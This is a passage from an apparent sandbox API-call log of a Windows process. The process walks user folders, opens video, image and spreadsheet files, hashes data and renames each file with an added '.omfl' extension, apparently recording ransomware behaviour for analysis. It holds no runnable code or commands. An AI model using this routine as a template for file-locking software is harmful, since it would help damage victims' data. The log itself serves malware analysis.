CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.221] GetLastError () returned 0x0 [0134.221] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.221] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.221] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.221] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.221] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.223] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\Rj Apxnq n-5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\rj apxnq n-5.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\Rj Apxnq n-5.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\rj apxnq n-5.flv.omfl")) returned 1 [0134.224] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\WBJWvf15jDRVX5pP2OU.swf") returned=".swf" [0134.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\WBJWvf15jDRVX5pP2OU.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\wbjwvf15jdrvx5pp2ou.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.225] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=71402) returned 1 [0134.225] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.228] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.229] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.229] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.229] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.230] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.230] GetLastError () returned 0x0 [0134.230] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.230] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.230] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.230] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.230] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.231] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\WBJWvf15jDRVX5pP2OU.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\wbjwvf15jdrvx5pp2ou.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\WBJWvf15jDRVX5pP2OU.swf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\wbjwvf15jdrvx5pp2ou.swf.omfl")) returned 1 [0134.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\Z2PFBQaxlzgqzSXBJv6.swf") returned=".swf" [0134.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\Z2PFBQaxlzgqzSXBJv6.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\z2pfbqaxlzgqzsxbjv6.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.233] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=78757) returned 1 [0134.233] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.237] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.238] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.238] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.238] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.238] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.238] GetLastError () returned 0x0 [0134.238] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.238] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.238] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.238] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.238] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.239] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\Z2PFBQaxlzgqzSXBJv6.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\z2pfbqaxlzgqzsxbjv6.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\Z2PFBQaxlzgqzSXBJv6.swf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\z2pfbqaxlzgqzsxbjv6.swf.omfl")) returned 1 [0134.241] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.241] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0134.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.242] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.242] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.242] PathFindFileNameW (pszPath="") returned="" [0134.243] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.243] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.243] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0134.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.244] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.244] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.244] PathFindFileNameW (pszPath="") returned="" [0134.244] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.244] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0134.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.245] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.245] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.245] PathFindFileNameW (pszPath="") returned="" [0134.246] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.246] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.246] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\") returned="_117G\\" [0134.246] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\") returned="_BvYf_mP_z7pO60\\" [0134.246] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0134.246] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.246] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.246] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.246] PathFindFileNameW (pszPath="") returned="" [0134.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\2ead0laCC VDc4Z0n.mkv") returned=".mkv" [0134.247] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\2ead0laCC VDc4Z0n.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\2ead0lacc vdc4z0n.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.247] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=13968) returned 1 [0134.247] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.250] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.251] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.251] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.251] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.251] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.251] GetLastError () returned 0x0 [0134.251] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.251] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.252] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.252] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.252] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.252] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\2ead0laCC VDc4Z0n.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\2ead0lacc vdc4z0n.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\2ead0laCC VDc4Z0n.mkv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\2ead0lacc vdc4z0n.mkv.omfl")) returned 1 [0134.254] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\8FPp.mp4") returned=".mp4" [0134.254] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\8FPp.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\8fpp.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.255] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=17621) returned 1 [0134.255] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.258] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.259] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.259] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.259] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.259] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.259] GetLastError () returned 0x0 [0134.259] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.259] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.259] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.259] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.259] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.260] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\8FPp.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\8fpp.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\8FPp.mp4.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\8fpp.mp4.omfl")) returned 1 [0134.262] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\a10jRWqyMMRsEf6EIuk.jpg") returned=".jpg" [0134.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\a10jRWqyMMRsEf6EIuk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\a10jrwqymmrsef6eiuk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.262] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=93900) returned 1 [0134.262] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.266] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.267] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.267] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.267] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.267] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.267] GetLastError () returned 0x0 [0134.267] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.267] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.267] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.267] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.268] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.269] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\a10jRWqyMMRsEf6EIuk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\a10jrwqymmrsef6eiuk.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\a10jRWqyMMRsEf6EIuk.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\a10jrwqymmrsef6eiuk.jpg.omfl")) returned 1 [0134.271] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\cgNM_Y0MMGzBe.ots") returned=".ots" [0134.271] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\cgNM_Y0MMGzBe.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\cgnm_y0mmgzbe.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.271] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=56750) returned 1 [0134.271] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.275] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.276] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.276] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.276] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.276] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.276] GetLastError () returned 0x0 [0134.276] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.276] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.276] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.276] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.276] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.277] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\cgNM_Y0MMGzBe.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\cgnm_y0mmgzbe.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\cgNM_Y0MMGzBe.ots.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\cgnm_y0mmgzbe.ots.omfl")) returned 1 [0134.279] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\DkDblRXRncBaIyTi.xls") returned=".xls" [0134.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\DkDblRXRncBaIyTi.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\dkdblrxrncbaiyti.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.279] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=79764) returned 1 [0134.279] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.283] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.284] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.284] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.284] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.284] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.284] GetLastError () returned 0x0 [0134.284] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.284] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.284] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.284] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.285] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.286] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\DkDblRXRncBaIyTi.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\dkdblrxrncbaiyti.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\DkDblRXRncBaIyTi.xls.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\dkdblrxrncbaiyti.xls.omfl")) returned 1 [0134.288] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\KAWZ0cxNQWiFNSyE.bmp") returned=".bmp" [0134.288] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\KAWZ0cxNQWiFNSyE.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\_117g\\kawz0cxnqwifnsye.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.288] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=53150) returned 1 [0134.288] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.291] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.292] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.292] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.292] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.293] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.293] GetLastError () returned 0x0 [0134.293] CryptDestroyHash (hHash=0xdce37f0) 